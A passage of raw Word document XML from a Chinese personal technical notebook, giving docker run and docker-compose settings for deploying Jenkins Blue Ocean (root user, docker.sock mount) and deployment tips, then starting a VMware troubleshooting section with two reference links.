        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916924">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker run \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8090EA" w14:textId="77777777" w:rsidR="00916924" w:rsidRPr="00916924" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916924">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  -u root \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B44694D" w14:textId="77777777" w:rsidR="00916924" w:rsidRPr="00916924" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916924">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  --rm \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A889866" w14:textId="77777777" w:rsidR="00916924" w:rsidRPr="00916924" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916924">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B4A69" w14:textId="77777777" w:rsidR="00916924" w:rsidRPr="00916924" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916924">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  -p 8080:8080 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54727150" w14:textId="77777777" w:rsidR="00916924" w:rsidRPr="00916924" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916924">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  -p 50000:50000 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4571FBBB" w14:textId="77777777" w:rsidR="00916924" w:rsidRPr="00916924" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916924">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  -v jenkins-data:/var/jenkins_home \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D2FD77" w14:textId="77777777" w:rsidR="00916924" w:rsidRPr="00916924" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916924">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  -v /var/run/docker.sock:/var/run/docker.sock \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559D5C2" w14:textId="79529179" w:rsidR="00CB7AD3" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00916924">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  jenkinsci/blueocean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126A5F74" w14:textId="77777777" w:rsidR="00CB7AD3" w:rsidRDefault="00CB7AD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702A87C4" w14:textId="4BA801EA" w:rsidR="003A3FD8" w:rsidRPr="003A3FD8" w:rsidRDefault="003A3FD8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A3FD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>我创建的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3FD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3FD8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-compose.yaml</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3FD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C220EC" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>version: "3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7275D0FA" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CDEFF75" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FAF011" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">  jenkins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D8775F" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    external: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15683E06" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2033BC" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D9F0A" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">  server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B4A7A" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: jenkinsci/blueocean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E5104D" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    container_name: jenkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAF15B0" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    restart: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DFF839" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    user: "root"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49428324" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADCD27" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - jenkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A4192E" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F669C2E" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - /root/jenkins/jenkins-data:/var/jenkins_home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E825977" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - /var/run/docker.sock:/var/run/docker.sock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AF1DE3" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A3BB1" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRPr="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - "8080:8080"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496207E2" w14:textId="7F70F846" w:rsidR="00CB7AD3" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000A6E98">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - "50000:50000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D54124" w14:textId="77777777" w:rsidR="00CB7AD3" w:rsidRDefault="00CB7AD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2030EC54" w14:textId="71FD9713" w:rsidR="00CB7AD3" w:rsidRPr="00AC6AEC" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC6AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>此处的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC6AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>volume</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC6AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>务必指定绝对路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C06BCE7" w14:textId="6A3B3BCF" w:rsidR="000A6E98" w:rsidRPr="00AC6AEC" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC6AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果不指定绝对路径，则会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC6AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC6AEC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">docker volume </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC6AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中创建该目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE71BB9" w14:textId="25C11B2E" w:rsidR="00CB7AD3" w:rsidRDefault="00537B2B" w:rsidP="00A02777">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="851" w:name="_Toc159780271"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署的坑点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="851"/>
    </w:p>
    <w:p w14:paraId="372BA45D" w14:textId="07311851" w:rsidR="00CB7AD3" w:rsidRPr="00521AFB" w:rsidRDefault="00521AFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00521AFB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>务必手动升级，升级之后才能看到管理凭据、使用别人的插件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D5E13" w14:textId="7DCB2AFD" w:rsidR="00CB7AD3" w:rsidRDefault="00521AFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="763D285D" wp14:editId="6B780455">
            <wp:extent cx="5274310" cy="2367280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="74599747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97477" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId317"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2367280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="531ED405" w14:textId="77777777" w:rsidR="00CB7AD3" w:rsidRDefault="00CB7AD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B8AAD7" w14:textId="719F2A3E" w:rsidR="00CB7AD3" w:rsidRPr="00CB7AD3" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>部署</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">jenkins </w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>upgrade</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后，重启</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>jenkins</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>jenkins</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>又会成为旧版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277EF0F2" w14:textId="1DC29C92" w:rsidR="00CB7AD3" w:rsidRPr="00282152" w:rsidRDefault="00282152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>因此，容器不要</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>down</w:t>
      </w:r>
      <w:r w:rsidRPr="00282152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，来维持持久化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC4B857" w14:textId="77777777" w:rsidR="00452B51" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E09D40" w14:textId="77777777" w:rsidR="00452B51" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FD6A34" w14:textId="77777777" w:rsidR="00452B51" w:rsidRPr="00F975F8" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E03172" w14:textId="77777777" w:rsidR="00452B51" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D5B342" w14:textId="77777777" w:rsidR="00452B51" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4AEACF" w14:textId="77777777" w:rsidR="00452B51" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311EB608" w14:textId="77777777" w:rsidR="00452B51" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023A188B" w14:textId="77777777" w:rsidR="00452B51" w:rsidRPr="00F975F8" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09CC327D" w14:textId="77777777" w:rsidR="00452B51" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B99C68" w14:textId="77777777" w:rsidR="00452B51" w:rsidRDefault="00452B51" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6061020A" w14:textId="77777777" w:rsidR="000909D8" w:rsidRDefault="000909D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64299343" w14:textId="77777777" w:rsidR="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3DDEAB" w14:textId="23A2E14B" w:rsidR="00FA01F9" w:rsidRDefault="00966782" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="852" w:name="_Toc159780272"/>
      <w:r>
        <w:t>vmware疑难杂症</w:t>
      </w:r>
      <w:bookmarkEnd w:id="852"/>
    </w:p>
    <w:p w14:paraId="65C2F62C" w14:textId="77777777" w:rsidR="00966782" w:rsidRDefault="00966782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F3243E" w14:textId="42FF1D2C" w:rsidR="00C6541E" w:rsidRDefault="00C6541E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="853" w:name="_Toc159780273"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>锁屏后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行卡顿</w:t>
      </w:r>
      <w:bookmarkEnd w:id="853"/>
    </w:p>
    <w:p w14:paraId="03523171" w14:textId="77777777" w:rsidR="00C6541E" w:rsidRDefault="00C6541E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F10786" w14:textId="3882469A" w:rsidR="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36470175" w14:textId="320BE65F" w:rsidR="00C6541E" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:t>https://blog.csdn.net/sffdsafsf/article/details/9248547</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D047AFA" w14:textId="7245E035" w:rsidR="00C6541E" w:rsidRPr="00C6541E" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:t>https://blog.csdn.net/qq_41725313/article/details/122058131</w:t>
      </w:r>
